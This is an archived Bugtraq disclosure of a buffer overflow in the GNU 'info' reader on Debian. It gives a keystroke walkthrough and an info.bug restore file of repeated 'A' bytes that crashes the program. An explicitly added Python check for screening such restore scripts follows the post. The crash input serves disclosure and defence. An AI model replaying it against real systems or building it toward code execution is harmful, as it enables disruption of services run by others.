Bugtraq mailing list archives
GNU/Linux 'info Buffer Overflow
From: Josh Martin <skizzles () gmail com>
Date: 6 Aug 2004 00:46:21 -0000
Package: info
Version: 4.7-2.1
Severity: grave
Tags: security
Justification: user security hole

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: LANG=C, LC_CTYPE=C

Versions of packages info depends on:
ii  libc6        2.3.2.ds1-15  GNU C Library: Shared libraries an
ii  libncurses5  5.4-4         Shared libraries for terminal hand

-- no debconf information

Information:

I have tested several versions (Debian stable, unstable and testing) and have found that this bug exists in all versions tested. I have included a small --restore script that can be used to leverage a simple seg fault. This buffer overflow is very trivial to leverage as there are several bytes available (10-15+). It may be possible that arbitrary system calls could be made through this hole. It is also possible to leverage this from the command line using the --restore=FILENAME flag, and need not have the program running. Although it is not running as suid, or as a daemon, in a case where info is being used as a public service, it may be a security problem. This bug seems only to be accessible where the file has xrefs available.

Walkthrough:

$ info info
[info screen comes up]
press 'g'
[Goto Node:] type 'Expert Info' <enter>
(OR any other way to get to a page with xrefs)
press 'f'
Type in 225 or more bytes and press enter.
SEG FAULT!

Example File:

The following can be saved to a file and called as:

info info --restore=info.bug

to create a segmentation fault.

[START info.bug]
gExpert Info
fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[END info.bug]
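A defender-side check, added here and not part of Josh Martin's post: it screens a --restore script of the kind shown above before it is replayed, which is the control a site exposing info "as a public service" would want. Assumptions (mine, inferred from the walkthrough): the restore file is a raw keystroke replay, one command key per line followed by the text typed at that key's prompt, newline standing for <enter>; the 225-byte figure from the post is used as the threshold; all function names are hypothetical.

```python
"""Screen an `info --restore` keystroke script for over-long prompt input."""

# Assumed format (not stated in the post): each non-empty line is one command
# key followed by the text typed at that key's prompt; the newline is <enter>.
PROMPT_KEYS = {"g": "Goto Node", "f": "Follow xref"}

# The post reports a crash at 225 or more bytes typed at the 'f' prompt,
# so anything above 224 bytes is treated as unsafe.
MAX_PROMPT_BYTES = 224


def parse_restore_script(data: bytes):
    """Split a restore script into (key, prompt_text) pairs, one per line."""
    commands = []
    for raw in data.split(b"\n"):
        if not raw:
            continue  # blank line: nothing typed
        commands.append((raw[:1].decode("latin-1"), raw[1:]))
    return commands


def find_overlong_prompts(data: bytes, limit: int = MAX_PROMPT_BYTES):
    """Return (command_index, key, length) for every prompt input over limit."""
    findings = []
    for index, (key, text) in enumerate(parse_restore_script(data), start=1):
        if key in PROMPT_KEYS and len(text) > limit:
            findings.append((index, key, len(text)))
    return findings


def is_safe_restore_script(data: bytes) -> bool:
    """True when no prompt in the script exceeds the byte limit."""
    return not find_overlong_prompts(data)


# Constructed samples in the shape of the post's info.bug: a node name at the
# 'g' prompt, then either 225 bytes or a short name at the 'f' prompt.
SAMPLE_BUG_SCRIPT = b"gExpert Info\n" + b"f" + b"A" * 225 + b"\n"
SAMPLE_OK_SCRIPT = b"gExpert Info\nfInvoking Info\n"

if __name__ == "__main__":
    for name, script in (("info.bug", SAMPLE_BUG_SCRIPT), ("ok", SAMPLE_OK_SCRIPT)):
        hits = find_overlong_prompts(script)
        print(name, "REJECT" if hits else "accept", hits)
```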
Current thread:
- GNU/Linux 'info Buffer Overflow Josh Martin (Aug 06)
- Re: GNU/Linux 'info Buffer Overflow Valdis . Kletnieks (Aug 06)
- Re: GNU/Linux 'info Buffer Overflow Niels Bakker (Aug 06)
- Re: GNU/Linux 'info Buffer Overflow Janusz A. Urbanowicz (Aug 07)
- Re: GNU/Linux 'info Buffer Overflow Roman Werpachowski (Aug 07)